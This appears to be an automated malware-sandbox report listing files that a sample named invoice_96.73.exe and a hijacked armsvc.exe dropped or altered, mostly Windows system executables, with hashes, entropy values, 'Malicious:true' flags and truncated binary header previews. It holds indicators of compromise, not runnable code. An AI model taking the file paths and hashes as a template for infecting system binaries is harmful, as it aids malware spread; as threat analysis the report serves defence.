                                                                                                                                                                SSDEEP:12288:Mez2DWUSV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:dz2DWLVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:A88AD079A4084959D6EC9C144B2577BE
                                                                                                                                                                SHA1:BB0FDEF8E9B69A1D137AF89AE4AA4FDFB80377BB
                                                                                                                                                                SHA-256:22949ED0C9461CFF73CF743006A2C945FEFDCC3A0231F66E802A9B39AB47E628
                                                                                                                                                                SHA-512:DFD1FEC0E0A2C5D0E744AFAD4D98B85FFA82F6A9911E8BC5F6482C26E0A13D0DB06E8B57399C1DA9EAE6586084C1C1260FE68D73ED5791F4E5464F8A2EF939E2
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........6..e..e..e.s.e..e.(.e..e.s.e..eI+.e..en*.e..eI+.e..eI+.e..eI+.e..e..e9.e.(.e..e.(.e..e.(.e..e.(.e..eRich..e........................PE..d...8..S..........#......"..."......@x.......................................p......wv.......................................................!..........<....`..X.......................................................................p............................text...$ .......".................. ..`.data...p....@.......&..............@....pdata..X....`.......*..............@..@.rsrc................@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):1537536
                                                                                                                                                                Entropy (8bit):4.06270126348672
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:KQVEwpV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:KQTTVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:BBA4722DF24C70555CF255FAE1A123D7
                                                                                                                                                                SHA1:B56C45039A5DA0ED09D435B3BED28F161719CAD1
                                                                                                                                                                SHA-256:DFC1009BA5D158B79ABF7236A064367CD46E49C331FFAE134E13B5A601F23B24
                                                                                                                                                                SHA-512:362A93A30DF082094ED05F17606CA8F9BB390BB2E0B66148CD0D2F8F81E1BDD1F43D86CF4CC189260A2DD001C27545D4E3E632AB20335BFA0A1FED744B9332F6
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x.m_<...<...<.......8.......>.......(.......0.......>..."..>.......=...<...........1.......-.......=.......=.......=...Rich<...........................PE..d...Wn.\.........."......\...8......0].........@.....................................N.... .......... ..................................H...............|............................|..T...........................`|...............p...............................text....Z.......\.................. ..`.rdata...#...p...$...`..............@..@.data...x...........................@....pdata..............................@..@.rsrc...|...........................@..@.reloc..............................@...........................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1640448
                                                                                                                                                                Entropy (8bit):4.193273739028681
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:pmEp39wV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Zt8Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:93D0DE2BC320CB6900054A5A15B11B8B
                                                                                                                                                                SHA1:B59DB39FD929FDB308D55F4DDA19BD7A77C75B61
                                                                                                                                                                SHA-256:F0CBE5072491461AC37C9468CC60F87930EC55588A75806F754E416454762E10
                                                                                                                                                                SHA-512:4F65D02E30ACAF1506551910A97B65714D5A073CBC40BBFB8B8DF01D0CD53D22B79D15513BD76ED7B486D5C03A6F1B926B6617F0EF47FA65F11CEE243256FC36
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P..1.1.1.`FM..1.XP...1.cb..1..Q...1..Q.1..Q.1..Q...1.1..}1.`FH..1.XP...1.XP...1.XP.1.Rich.1.........PE..d....k.\.........."..........2.................@.............................P.......a.... .................................................<........P..l....@..h.......................T........................... ................................................text............................... ..`.rdata..............................@..@.data........ ......................@....pdata..h....@......................@..@.rsrc...l....P....... ..............@..@.reloc.......`.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1557504
                                                                                                                                                                Entropy (8bit):4.126538624426098
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:Ov1V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:63Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:A2BCD9786CBF60D37D8490431429D8DC
                                                                                                                                                                SHA1:C1AF889C21F1D4D4B6F7A4324202DE5D8C098F15
                                                                                                                                                                SHA-256:79CAC0C495066891E69E205935ACEB6D199521A9FEE4F7B2A552F748B01315DF
                                                                                                                                                                SHA-512:6A6C2587C98EA72C426878EC074EDEA95904F91AAB478C277BAB8F3B1C9521B151745F7CA8392A4C760E2C5D62EDA1A675B1055FA48BB994D519C9075F836BFD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................e~.....B......e~.....e~.....e~............}......}......}.......}......}.....Rich...........................PE..L...C..S............................................................................{B........... ..........................d...........<...........................................................(:..@............................................text...B........................... ..`.data...............................@....rsrc...............................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1613312
                                                                                                                                                                Entropy (8bit):4.205916839131255
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:9TNUppvVg9N9JMlDlfjRiVuVsWt5MJMs:9TNepdgFIDRRAubt5M
                                                                                                                                                                MD5:E29960A06D3F74565F82ED6205D852EE
                                                                                                                                                                SHA1:FF986B7206F347BFB595346F815D7282BA590797
                                                                                                                                                                SHA-256:DCFE73696C6639FFE45B1C3B1D1918FB0D400251C634C54A41A72089A75ED68C
                                                                                                                                                                SHA-512:AB55F06F6DF9A9C8CF8BA21B05E3ED99D315756E6415C110EFB9EC77115B227E6974369D0508350BE6EFF89AA174260746A663163D06C6907FA589D4BA3EB729
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~KM..%...%...%.;h....%..~!...%..M....%.T.$...%.T.&...%.T. ...%.T.!...%...$.'.%.;h....%..~,...%..~....%..~'...%.Rich..%.................PE..L...ln.\.........."..........6.......R............@.........................................................................`...........l...........................p...T..............................@...............\............................text............................... ..`.data...p...........................@....idata..............................@..@.rsrc...l...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1762304
                                                                                                                                                                Entropy (8bit):4.493031751834092
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:etzKexpWLVg9N9JMlDlfjRiVuVsWt5MJMs:etvxg5gFIDRRAubt5M
                                                                                                                                                                MD5:CBA5181DB9E9B202F44EA5591F64BC5F
                                                                                                                                                                SHA1:8C1D0B66F9C03E8BB6A7E36E18D5F3E421454C76
                                                                                                                                                                SHA-256:89EA4C0E4FF6077EB7A306400E832A65B2617A95E824E75E9CCC3325391CD702
                                                                                                                                                                SHA-512:12FB72CC814292755B1891FB955513ADC83FFF7629F86343817607F2EFBF39F33597472B6C7000483F1883FC7A2ABFE65CCC23E2557EF58E0DD079AFD8E1641F
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.H-#.&~#.&~#.&~*.~6.&~=.~'.&~*.~..&~*.~..&~.^K~!.&~.^]~,.&~#.'~..&~*.~3.&~=.~".&~#..~".&~*.~".&~Rich#.&~........PE..L...P..X.....................(.......z............@..........................0......Y........................................}...........9..........................P................................<..@...............h............................text............................... ..`.rdata..L...........................@..@.data....:...........~..............@....rsrc....9.......:..................@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\23f9eaead4df6ab2.bin

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12320
                                                                                                                                                                Entropy (8bit):7.984338331722136
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:e0EHAVyb/xHecLScjT9BmAjBS7aqs3RL6Ctx:e0U/pecL7JuAxtx
                                                                                                                                                                MD5:37F42B4446E913B289E65D1D747C94B2
                                                                                                                                                                SHA1:AF81E8FC0EC39D47858D4C65397F46F699AFDD27
                                                                                                                                                                SHA-256:0A74238579F3B989B485A4BE52E25816BFC263C189F3BCB9F5C1AD791987B45C
                                                                                                                                                                SHA-512:0B1B3A6415CAFCCD7A29100BDE3A49F822CBE8CC68EE429A33C54AD944C3658F1D7887E9C48C042A1B53E7ABF80004D8D2EE9BDE241C5E4CD8EAD77B6A44FB42
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.u.V..y....I..`w..h..p...=...{_....I.......f..|uF.@.....wWo...k.*y-....&.\j..Dk......KBK(~.?.S....y.....?R...?....*...O..J.Bd..]f...Y.67.. .Q....bS.F.)....B.L%.u...".D.G.#..P.Y....q+..F.A.he... .@..V.<.L.5v.M..a&.......%J.6.{W;.IA.....I....a...l.(V..........d.H..n..@.BL..L..O1...~9#.....5...U_+;f,[(g.....+..PS...B.&..Q.{........[........i._._.....M5....h.s.k..0..s:..J..+s~...;.,j.ft....m....s^.......8+.<....>5......~..xQ.Lz.,<G[..>..9MT\I.>.....O./...YN<..../`.i...2/....2..jr..?.o...z.f}..5.a..%V..[&.?..M15.D!.8..D.y.LL.W.j.`q.O#....d.J.`....rO+.....N.!<.....3....^..9...0.W...)...|._AJ...|.e.."O..F]....'I.M.....W..M..[1...7.I.x.....5..3=.[...Q).?.#;x...|...F.o.....EY.U....L..o.b.FLP.m...,x$..t.......l....(m......}..}\.....Vf..\\....> .dh....Ef.8..S...y.......@=..N.5....r.S..=r.....5.M.E37.-....N........?...@HB..&_...I..$/dP....;.bm9._.k%%>.EtI.S.k.F.9..J.@z.=$..AH....|.....n.[..'.y.h.>*.[6.q."T.....A4sE..../..S...o...Zt{s.P}.?.........0..F

                                                                                                                                                                C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1519104
                                                                                                                                                                Entropy (8bit):4.0234568202993835
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:ZV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:jVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:4A3EAAF9D1C0E0BB3F263E7A314171FA
                                                                                                                                                                SHA1:B7D7A0C18899D35D10AB400646213B0A24BD7BBF
                                                                                                                                                                SHA-256:73F7E7E54F4F9D2BBEDA32027B4BBDE576086E9D9235668FECA51B7245E6DAA0
                                                                                                                                                                SHA-512:5C87EB73637025BB2CE7C9D5639AB2C9E93AB80C2345D0479D09C108519F6D9E0D0CC60509A3C9F7A7E36B4AF13EA16A7A43D3BE81B83A2F125957E773A24E37
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........wL_..._..._...V..^...V..^..._.......V..@...V..F...V..^...V..^...Rich_...........PE..L.....[J..................... .......-.......@...............................`...... ............ ..........................|2..@....P..............................................................(...@...p...t.......p............................text...&-.......................... ..`.data........@.......4..............@....rsrc........P.......6..............@..@.reloc.......p.......N..............@...o.[J......[J......[J......[J......[J......[J......[J(.....[JQ.....[Jz.....[J......[J......[J......[J......[J......[J......[J+.....[J......[JQ...........msvcrt.dll.ntdll.dll.RPCRT4.dll.API-MS-Win-Core-ErrorHandling-L1-1-0.dll.API-MS-Win-Core-Heap-L1-1-0.dll.API-MS-Win-Core-Interlocked-L1-1-0.dll.API-MS-Win-Core-LibraryLoader-L1-1-0.dll.API-MS-Win-Core-LocalRegistry-L1-1-0.dl

                                                                                                                                                                C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1269760
                                                                                                                                                                Entropy (8bit):7.274319568698423
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Rlv3yIUPE1Bubmq3OT6j35Vg9N9JMlDlfjRiVuVsWt5MJMs:RlfyIUPE1BuBeujzgFIDRRAubt5M
                                                                                                                                                                MD5:862331ACCCC3F8DC8BF248C0E6CF16A3
                                                                                                                                                                SHA1:A014E65F4504C52B2CF2EDA31424613FB69DA5DA
                                                                                                                                                                SHA-256:87603B6CEA40695DDB56B87B6C2CB292F80C06CC0B7A00FE8A0C221CFEB9BAAC
                                                                                                                                                                SHA-512:E9E0854F903C5173F8C13398DC9AAA2E335001309B6B158CCAAD58B962943684F297000D649D12BE9EA182F266F669E76765C154BF66F3BDCA08B405F2FA46CD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.>e>gP6>gP6>gP67..6<gP67..6.gP6>gQ6.fP67..6*gP67..6.gP67..64gP67..6?gP67..6?gP6Rich>gP6................PE..d...9..L.........."............................@...............................................................................................h............P..T?...................................................................................................text............................... ..`.data....c.......X..................@....pdata..T?...P...@...$..............@..@.rsrc................d..............@..@.reloc...............p..............@...U..L.......L....@..L.......L.......L....7..L.......L.......L.......L....n..L.......L....Q..L....8..L!......L....,..L9...0..LC......LP...O..L\...M..Lh...r..Ls......L............ADVAPI32.dll.ntdll.DLL.pcwum.DLL.KERNEL32.dll.msvcrt.dll.VERSION.dll.SHLWAPI.dll.RPCRT4.dll.TAPI32.dll.GDI32.dll.WINSPOOL.DRV.US

                                                                                                                                                                C:\Windows\System32\Locator.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):3.999993628788772
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:dV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:vVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:16E5AF7C321FDD4D4ABCA40501F44C18
                                                                                                                                                                SHA1:33271C58B23847E9575E158BA66E9D0585A01E2C
                                                                                                                                                                SHA-256:39C588E940128285CFBBCF70925361112CCF626F78DE8F13C65D170C6E946915
                                                                                                                                                                SHA-512:23EE62A4A769049B76C77FD4E37701D3D974DA2B293414FE277B2E9783E17C5DB5CF1A1642DB3CA939390782084FF6F971AC2CBB984EF9A9BA6D9FA536A9D9C3
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l_.............f.......f...............f.......f.......f.......f.......f......Rich....................PE..d...Q.[J..........".................<........................................P......~1............... ...............................................P.......@..........................................................................p............................text............................... ..`.data...P....0......................@....pdata.......@......................@..@.rsrc........P......................@..@.reloc.......`.......&..............@....[Jx...+.[J....+.[J....^.[J....^.[J......[J......[J......[J'.....[JG...+.[J......[Jq...+.[J......[J......[J............msvcrt.dll.NTDLL.DLL.API-MS-WIN-Service-Core-L1-1-0.dll.API-MS-WIN-Service-winsvc-L1-1-0.dll.API-MS-Win-Core-ErrorHandling-L1-1-0.dll.API-MS-Win-Core-LibraryLoader-L1-1-0.dll.API-MS-Wi

                                                                                                                                                                C:\Windows\System32\Msdtc\Trace\dtctrace.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                Entropy (8bit):0.2885420714790396
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:/2lAwtvU07qF69Fq5C1qx6CzE5Z2+fqjF+:/Cdvj1V1qRiY+fC+
                                                                                                                                                                MD5:EBA89C0AABCF9C08B085258BD4E1EC53
                                                                                                                                                                SHA1:3883BBB39DEF0C7B91C90098B04894B6DFAEFB95
                                                                                                                                                                SHA-256:2FB904639E10DDC2DAE1DB85275CF25ED3497F3909F2B0B3FD45012E33B7FB49
                                                                                                                                                                SHA-512:74C786E5908B7C5506CBAD46A1320395D6EBD157EB4E945DF522F878DF957457104097628140ED767DE5E5D81EC4DAB9D4B8141A141E649959C62B34923DC452
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.@......................................................................................Wm...............@......................aa..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................9.mr.... .....P..\.A..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\System32\SearchIndexer.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1173504
                                                                                                                                                                Entropy (8bit):7.173665625934242
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:k9Bcju8+g/Gb4uzVg9N9JMlDlfjRiVuVsWt5MJMs:kQStg/Gb44gFIDRRAubt5M
                                                                                                                                                                MD5:7E061EBDFE0521A35049E6D587FB7295
                                                                                                                                                                SHA1:9A29AAFD3A8C2DE45BD4C415707A65840C049A0D
                                                                                                                                                                SHA-256:9745F632916C36A2460D115D11DFFAA0CB98C4FEF7C8E95C44DD8064F51C97DE
                                                                                                                                                                SHA-512:F02E6D27382159ACA41E03D6B0CCA6D8BBECEC3C6D8A804EDB9F50CE421FEF6EBFCCCACCE1D5A6136C139A583A2D32507B7C0AA16EDFBD92B6398B0E9BEBD7EC
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g~.F...F...F...O~..D...O~..O...O~..]...F...1...O~..^...O~......O~..G...O~..G...RichF...........................PE..d......M.........."..............................................................................................................................................m......................8...................................................t........................text............................... ..`.rdata..............................@..@.data...$(.......&..................@....pdata...m.......n..................@..@.rsrc................h..............@..@.reloc..............................@......Mx...2..M....%..M....2..M.......M.......M....2..M....2..M....%..M....)..M....z..M....Y..M.......M.......M............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.TQUERY.DLL.SHLWAPI.dll.MSSRCH.DLL.IMM32.dll............

                                                                                                                                                                C:\Windows\System32\VSSVC.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2180096
                                                                                                                                                                Entropy (8bit):6.687257367542032
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:T4W+J/pHuR7n20mT4FE2LnwUxfvgFIDRRAubt5M:EsxgUf
                                                                                                                                                                MD5:E35ACC5A7E387F3E224A1F35E9FFBE11
                                                                                                                                                                SHA1:228A169C86642ADC20641A74C10F0D07215BAD91
                                                                                                                                                                SHA-256:E5541C557F0CE94736DD8FF7927A16AB422EC395641B584348417227E923A5BF
                                                                                                                                                                SHA-512:96085BC8C46E662D48FC72036988EB30DEB6A32903B0531BA968A79413EF3D4A31DCBDBF5D0354ED2FA5541CB756177E778AFC9AE7D43B8928645E25FD64B8BC
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......69..rXj.rXj.rXj.{ ..pXj.{ ..[Xj.rXk..Yj.{ .nXj.{ ...Xj.{ .~Xj.{ ..sXj.{ ..sXj.RichrXj.........PE..d......L.........."......F...,................................................!......"".............. .......................................-.......@...N..............................................................................`............................text...PD.......F.................. ..`.data...(!...`.......L..............@....pdata...............b..............@..@.rsrc....N...@...P..................@..@.reloc...............T..............@...U..L.......L.......L.......L.......L....7..L.......L....h..L....,..L.......L$...0..L0...n..L=......L.......LH......LS......L`...i..Lk......Lv...q..L....3..L.......L.......L....\..L.......L.......L.......L............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.USER32.dll.msvcrt.dll.ATL.DLL.ole32.dll.SHLWAPI.dll.OLEAUT32

                                                                                                                                                                C:\Windows\System32\alg.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1577472
                                                                                                                                                                Entropy (8bit):4.148166410307214
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:wLeYV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:wLeUVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:D51E3C5F1FB63103D04A4FDBBC56FEE7
                                                                                                                                                                SHA1:692DF203C8DDF5357AF66600481815440D83E010
                                                                                                                                                                SHA-256:6547261C1535DFBE5DD413D4F1DF924B9AD82B1A730D322F06E51810217E5931
                                                                                                                                                                SHA-512:40C825B5F93F377B21802FA90BEB2EF35ECB7337B2ED0C424D3574D404A973A55B2C74ADBFD1F02C1FD3C87F0A854D6A0A89D351BBB922B27D5EC18A6FF5E6FF
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I..&.dxu.dxu.dxu...u.dxu...u.dxu...u.dxu.dyuudxu...u.dxu...u.dxu...u.dxu...u.dxuRich.dxu........................PE..d.....[J.........."..........D...............................................@...................... ......................................,........0....... ......................P................................................................................text............................... ..`.data...............................@....pdata....... ......................@..@.rsrc........0... ..................@..@.reloc.......P.......2..............@...k.[Jh.....[Ju...+.[J......[J....+.[J....p.[J......[J......[J......[J....+.[J......[J......[J............ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.msvcrt.dll.ATL.DLL.WS2_32.dll.ole32.dll.OLEAUT32.dll.WSOCK32.dll.MSWSOCK.DLL................................................................................

                                                                                                                                                                C:\Windows\System32\dllhost.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508352
                                                                                                                                                                Entropy (8bit):3.9945760567474156
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:GV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:WVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:0F5B09C2B87A9F58233F4C265F891275
                                                                                                                                                                SHA1:73AFF2EC53F77218DD0BFAD179868D15A76448BA
                                                                                                                                                                SHA-256:9EE7032DB4615C8B62DC901D37D4D1F29A00FA61290202790EEA5FD6B366AD7C
                                                                                                                                                                SHA-512:A131F258FF1A08A9E8AE0C76FA8CD3E859401EA55978AA1BD7CE46140F717FE0BEE48E2F18B746A9A9C89CAF9474E65855AF0CAE3B2A4905A816566BF376E57E
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z...z...z.......z.....z.....z...{...z.......z.....z.....z.....z.Rich..z.................PE..d...T.[J..........".................L........................................P.......`.......................................................!..d....P.......@......................p...8.......................................\.... ..8............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc........P....... ..............@..@.reloc.......`.......$..............@.....[J0.....[J=...+.[JH.....[JR...+.[JH...........KERNEL32.dll.msvcrt.dll.NTDLL.DLL.ole32.dll.............................................................................................................................................................................

                                                                                                                                                                C:\Windows\System32\ieetwcollector.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1612800
                                                                                                                                                                Entropy (8bit):4.210831825475154
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:XERpPV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:6p9Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:475B5B41F2CFABE32500D1A9602C2A3E
                                                                                                                                                                SHA1:C71BC97C9DEFB4A3958CE628E460C11AC74F4801
                                                                                                                                                                SHA-256:4293F6F72EBC40C6E4C5E3D358D092BF8556B1291489CC2996DFB5AE5B2244B9
                                                                                                                                                                SHA-512:F93926EF23DEA35E533FEE3CAE6F29EC422AA02B79AC58AA737BEE37E66C6F091DC8154E4C6F75C10EF055AB11F5BB2EF998A6A2324273CF2105EC539B79C6E3
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A.SK a.K a.K a....A a...." a....x a....@ a.K `.. a....G a....J a....J a.RichK a.........................PE..d....p.X.........."......p...n.................@....................................W].... .......... ......................................P...x...............\....................................................?..................H............................text...ho.......p.................. ..`.data....8...........t..............@....pdata..\...........................@..@.idata..............................@..@.rsrc...............................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\System32\msdtc.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1639936
                                                                                                                                                                Entropy (8bit):4.188266282630206
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:Oky+V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Zy+Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:8A39539F9626492BC25BBEF9E516EC26
                                                                                                                                                                SHA1:30A72514FFE2EDBDD8637884AF0E106955C5437B
                                                                                                                                                                SHA-256:B85BE38107062EA87F118A93AB23401EC3E949BB4B9CC6CEC09BC567A3144DE6
                                                                                                                                                                SHA-512:78CA0E9E1DB2CCA8ADC717FD2D7F1908632C7C2225A2624BC89A5335888C4F5F111AC3D1E584664618A73527B1B1890BE6F824A591DB4BD8DB78C3E84F95D5CC
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........bUUJ.;.J.;.J.;.C{..H.;.C{..[.;.J.:...;.C{..^.;.C{..].;.C{..I.;.C{..K.;.C{..K.;.RichJ.;.........PE..d...Z.[J.........."............................@.............................`......;f...............@.................................................px......D...................P................................................................................text...z........................... ..`.data...x(..........................@....pdata..D...........................@..@.rsrc...px.......z..................@..@.reloc.......p.......&..............@.....[JX...+.[Je.....[Jo.....[Jy...+.[Je.....[J....+.[Je.....[J......[J....k.[J............KERNEL32.dll.NTDLL.DLL.ole32.dll.msvcrt.dll.MSDTCTM.dll.VERSION.dll.USER32.dll.ADVAPI32.dll.....................................................................................................................................

                                                                                                                                                                C:\Windows\System32\msiexec.exe

                                                                                                                                                                Download File
